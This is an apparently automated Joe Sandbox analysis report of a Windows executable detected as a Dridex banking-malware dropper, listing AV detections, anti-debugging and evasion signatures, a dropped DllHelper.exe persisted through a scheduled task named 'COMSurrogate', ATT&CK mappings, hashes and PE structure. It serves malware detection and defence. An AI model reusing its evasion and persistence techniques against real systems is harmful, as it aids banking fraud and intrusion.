Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Jaik.84784.3654.20731

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.Jaik.84784.3654.20731 (renamed file extension from 20731 to exe)
Analysis ID:662065
MD5:74cd3c3d32dcf5029d1bc66347f44af7
SHA1:d7ec9719a6e5ea0b386ef590b1b74c317e597ff8
SHA256:cb943da125fde19e41c965a9f260caf79a6fca98c89b83bde609b843be0da377
Tags:exe
Infos:

Detection

Dridex Dropper
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for dropped file
Dridex dropper found
Machine Learning detection for sample
Uses 32bit PE files
PE file contains strange resources
Drops PE files
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Checks if the current process is being debugged
PE file contains sections with non-standard names
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
PE / OLE file has an invalid certificate
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Abnormal high CPU Usage

Classification

  • System is w10x64
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeVirustotal: Detection: 58%Perma Link
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeReversingLabs: Detection: 69%
Source: C:\Users\user\AppVerif\DllHelper.exeAvira: detection malicious, Label: TR/Dropper.Gen7
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeJoe Sandbox ML: detected
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: C:\pik vevaye\Wapawini\gal\Yim.pdb source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.dr
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.drString found in binary or memory: http://s.symcd.com06
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0.

E-Banking Fraud

barindex
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B886DE InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__cftoe,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_strlen,WriteFile,OutputDebugStringA,__itow_s,__invoke_watson_if_error,0_2_00B886DE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B88F12 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,0_2_00B88F12
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DllHelper.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DllHelper.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: DllHelper.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B8BAF00_2_00B8BAF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B824600_2_00B82460
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B8AD100_2_00B8AD10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: String function: 00B81290 appears 31 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: String function: 00B809F0 appears 106 times
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: String function: 00B7D760 appears 144 times
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: invalid certificate
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeProcess Stats: CPU usage > 98%
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: DllHelper.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeVirustotal: Detection: 58%
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeReversingLabs: Detection: 69%
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeJump to behavior
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B78A10 __wcstoui64,__wdupenv_s,SetThreadPriority,FindVolumeClose,GetCommConfig,LoadLibraryW,GetThreadPriority,GetCommandLineW,SetLastError,GenerateConsoleCtrlEvent,MoveFileWithProgressA,GetProcessHeaps,GetLastError,GetModuleHandleW,GetLastError,InitializeSListHead,DebugSetProcessKillOnExit,EnumSystemGeoID,GetProcessHeap,HeapFree,GetProcAddress,VirtualProtect,LoadResource,GetACP,FreeResource,__atodbl_l,SetConsoleCtrlHandler,SetConsoleCursorPosition,GetCalendarInfoW,VirtualProtect,0_2_00B78A10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeFile created: C:\Users\user\AppVerifJump to behavior
Source: classification engineClassification label: mal68.bank.winEXE@1/2@0/0
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic file information: File size 1870760 > 1048576
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x19f800
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\pik vevaye\Wapawini\gal\Yim.pdb source: SecuriteInfo.com.Variant.Jaik.84784.3654.exe, DllHelper.exe.0.dr
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B98235 push edi; retf 0_2_00B98236
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00D0F460 push ebp; iretd 0_2_00D0F461
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B7962F pushfd ; ret 0_2_00B79630
Source: SecuriteInfo.com.Variant.Jaik.84784.3654.exeStatic PE information: section name: .tenio
Source: DllHelper.exe.0.drStatic PE information: section name: .tenio
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B901F0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_00B901F0
Source: initial sampleStatic PE information: section name: .text entropy: 7.816031131002002
Source: initial sampleStatic PE information: section name: .text entropy: 7.816031131002002
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeFile created: C:\Users\user\AppVerif\DllHelper.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-17493
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-17652
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeDropped PE file which has not been started: C:\Users\user\AppVerif\DllHelper.exeJump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeAPI coverage: 9.0 %
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeAPI call chain: ExitProcess graph end nodegraph_0-18062
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeAPI call chain: ExitProcess graph end nodegraph_0-17495
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B80A60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B80A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B88F12 InterlockedIncrement,__itow_s,__invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,__strftime_l,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,_wcscpy_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,_wcscat_s,__invoke_watson_if_error,__snwprintf_s,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,__invoke_watson_if_oneof,_wcscpy_s,__invoke_watson_if_error,GetFileType,_wcslen,WriteConsoleW,GetLastError,__invoke_watson_if_oneof,_wcslen,WriteFile,WriteFile,OutputDebugStringW,__itow_s,__invoke_watson_if_error,___crtMessageWindowW,0_2_00B88F12
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B901F0 LoadLibraryA,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,0_2_00B901F0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B78A10 __wcstoui64,__wdupenv_s,SetThreadPriority,FindVolumeClose,GetCommConfig,LoadLibraryW,GetThreadPriority,GetCommandLineW,SetLastError,GenerateConsoleCtrlEvent,MoveFileWithProgressA,GetProcessHeaps,GetLastError,GetModuleHandleW,GetLastError,InitializeSListHead,DebugSetProcessKillOnExit,EnumSystemGeoID,GetProcessHeap,HeapFree,GetProcAddress,VirtualProtect,LoadResource,GetACP,FreeResource,__atodbl_l,SetConsoleCtrlHandler,SetConsoleCursorPosition,GetCalendarInfoW,VirtualProtect,0_2_00B78A10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B7D060 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B7D060
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B80A60 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B80A60
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B805D0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00B805D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B85760 SetUnhandledExceptionFilter,0_2_00B85760
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: GetLocaleInfoA,0_2_00B94180
Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exeCode function: 0_2_00B85780 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00B85780
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2
Native API
Path InterceptionPath Interception1
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
Exfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Virtualization/Sandbox Evasion
LSASS Memory4
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)2
Software Packing
Security Account Manager1
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
Deobfuscate/Decode Files or Information
NTDS1
Process Discovery
Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information
LSA Secrets12
System Information Discovery
SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
SecuriteInfo.com.Variant.Jaik.84784.3654.exe59%VirustotalBrowse
SecuriteInfo.com.Variant.Jaik.84784.3654.exe69%ReversingLabsWin32.Trojan.Jaik
SecuriteInfo.com.Variant.Jaik.84784.3654.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppVerif\DllHelper.exe100%AviraTR/Dropper.Gen7
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
No contacted IP infos
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:662065
Start date and time: 12/07/202217:42:072022-07-12 17:42:07 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 8m 13s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:SecuriteInfo.com.Variant.Jaik.84784.3654.20731 (renamed file extension from 20731 to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:16
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.bank.winEXE@1/2@0/0
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 3.4% (good quality ratio 3.3%)
  • Quality average: 70.7%
  • Quality standard deviation: 18.5%
HCA Information:
  • Successful, ratio: 96%
  • Number of executed functions: 15
  • Number of non-executed functions: 36
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
  • Excluded IPs from analysis (whitelisted): 23.211.6.115
  • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
  • Not all processes where analyzed, report is missing behavior information
TimeTypeDescription
17:45:30Task SchedulerRun new task: COMSurrogate path: C:\Users\user\AppVerif\DllHelper.exe
No context
No context
No context
No context
No context
Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):480444416
Entropy (8bit):0.06514875317096143
Encrypted:false
SSDEEP:
MD5:BD864AE710BD408189F12305EEDC2008
SHA1:D6EB0CE0A3F94D8A288B0A6B50DC02DF2EE22B35
SHA-256:CE16864816826C0D87BEC3473B15F215D7F572D8DDD52600E4C82D834F535D10
SHA-512:049FE137771902D76BE572A069A607B1B0BD25C638DED9752B6E572758E9093ABB258F95368E1310C05175BCD4139F7901202241FBDA068074CDFB9895439A82
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
Reputation:low
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,...h..h..h..v...y..v...T..v......O..k..h.....v...j..v...i..h...i..v...i..Richh..........................PE..L...,.(]..........................................@......................................@.................................l...(....`...............x..................................................@............................................text...`........................... ..`.data...h1..........................@....tenio.......P......................@....rsrc........`......................@..@.reloc..rG.......H...0..............@..B................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.84784.3654.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):26
Entropy (8bit):3.95006375643621
Encrypted:false
SSDEEP:3:ggPYV:rPYV
MD5:187F488E27DB4AF347237FE461A079AD
SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:true
Reputation:high, very likely benign file
Preview:[ZoneTransfer]....ZoneId=0
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.789455480828862
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.53%
  • InstallShield setup (43055/19) 0.43%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:SecuriteInfo.com.Variant.Jaik.84784.3654.exe
File size:1870760
MD5:74cd3c3d32dcf5029d1bc66347f44af7
SHA1:d7ec9719a6e5ea0b386ef590b1b74c317e597ff8
SHA256:cb943da125fde19e41c965a9f260caf79a6fca98c89b83bde609b843be0da377
SHA512:6b1340641f1f7820755ccc9e78b083ab32444d560274103e21a3ccaf4dee93b62340a6445960dc5a8f09a0de87c138e182a2c1012fdaf4f4d6d39e88922451fe
SSDEEP:49152:yCu54sLM0OEl6bINMreuk8i09pEkJz5lAcs5PVS7fhl:yCu5OGpQefZ0vfTsfSj
TLSH:9D851208EA509426F4F7863451F98AADA63C94D71F4845C387E4A3FA866C3D0FE3257B
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,...h...h...h...v...y...v...T...v.......O...k...h.......v...j...v...i...h...i...v...i...Richh...........................PE..L..
Icon Hash:e0ccbcccc2f2e4cc
Entrypoint:0x40cdb0
Entrypoint Section:.text
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:0x5D280B2C [Fri Jul 12 04:23:08 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:5
OS Version Minor:0
File Version Major:5
File Version Minor:0
Subsystem Version Major:5
Subsystem Version Minor:0
Import Hash:7f1ef45f5deb563bbecd8473c31a66d3
Signature Valid:false
Signature Issuer:CN=R3, O=Let's Encrypt, C=US
Signature Validation Error:A certificate chain could not be built to a trusted root authority
Error Number:-2146762486
Not Before, Not After
  • 5/23/2022 2:32:40 AM 8/21/2022 2:32:39 AM
Subject Chain
  • CN=www.artweaver.de
Version:3
Thumbprint MD5:BC879E2879685CBEB888E5D32DD8189D
Thumbprint SHA-1:01B29404E8E3D0019404677B8E9699DF9750B294
Thumbprint SHA-256:0FA3497022A3B9B10A0B786533C315048B785CDFE262198828BDCAB722017FC9
Serial:03BB38E009072B417BF8459D28B7B3D18D33
Instruction
mov edi, edi
push ebp
mov ebp, esp
call 00007F3584C45E4Bh
call 00007F3584C3D496h
pop ebp
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov edi, edi
push ebp
mov ebp, esp
push FFFFFFFEh
push 0059F440h
push 004112B0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFF94h
push ebx
push esi
push edi
mov eax, dword ptr [005A1338h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-70h], 00000000h
mov dword ptr [ebp-04h], 00000000h
lea eax, dword ptr [ebp-60h]
push eax
call dword ptr [004010C4h]
mov dword ptr [ebp-04h], FFFFFFFEh
jmp 00007F3584C3D4A8h
mov eax, 00000001h
ret
mov esp, dword ptr [ebp-18h]
mov dword ptr [ebp-78h], 000000FFh
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, dword ptr [ebp-78h]
jmp 00007F3584C3D5D7h
mov dword ptr [ebp-04h], FFFFFFFEh
call 00007F3584C3D614h
mov dword ptr [ebp-6Ch], eax
push 00000001h
call 00007F3584C4738Ah
add esp, 04h
test eax, eax
jne 00007F3584C3D48Ch
push 0000001Ch
call 00007F3584C3D5CCh
add esp, 04h
call 00007F3584C450D4h
test eax, eax
jne 00007F3584C3D48Ch
push 00000010h
Programming Language:
  • [ASM] VS2008 build 21022
  • [C++] VS2008 build 21022
  • [ C ] VS2008 build 21022
  • [IMP] VS2005 build 50727
  • [RES] VS2008 build 21022
  • [LNK] VS2008 build 21022
NameVirtual AddressVirtual Size Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IMPORT0x19fc6c0x28.text
IMAGE_DIRECTORY_ENTRY_RESOURCE0x1a60000x21cc8.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
IMAGE_DIRECTORY_ENTRY_SECURITY0x1c78000x13a8
IMAGE_DIRECTORY_ENTRY_BASERELOC0x1c80000x19c0.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG0x12000x1c.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
IMAGE_DIRECTORY_ENTRY_TLS0x00x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x82a80x40.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_IAT0x10000x1bc.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
.text0x10000x19f6600x19f800False0.8492162821525271data7.816031131002002IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data0x1a10000x31680x1400False0.3314453125data3.4095039121071826IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tenio0x1a50000x40x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc0x1a60000x21cc80x21e00False0.8149792435424354data7.4602970996808775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc0x1c80000x47720x4800False0.3001844618055556data3.257312610228726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
NameRVASizeTypeLanguageCountry
RT_ICON0x1a63600x1608ePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON0x1bc3f00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
RT_ICON0x1c06180x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 16777216, next used block 0
RT_ICON0x1c2bc00xea8data
RT_ICON0x1c3a680x668data
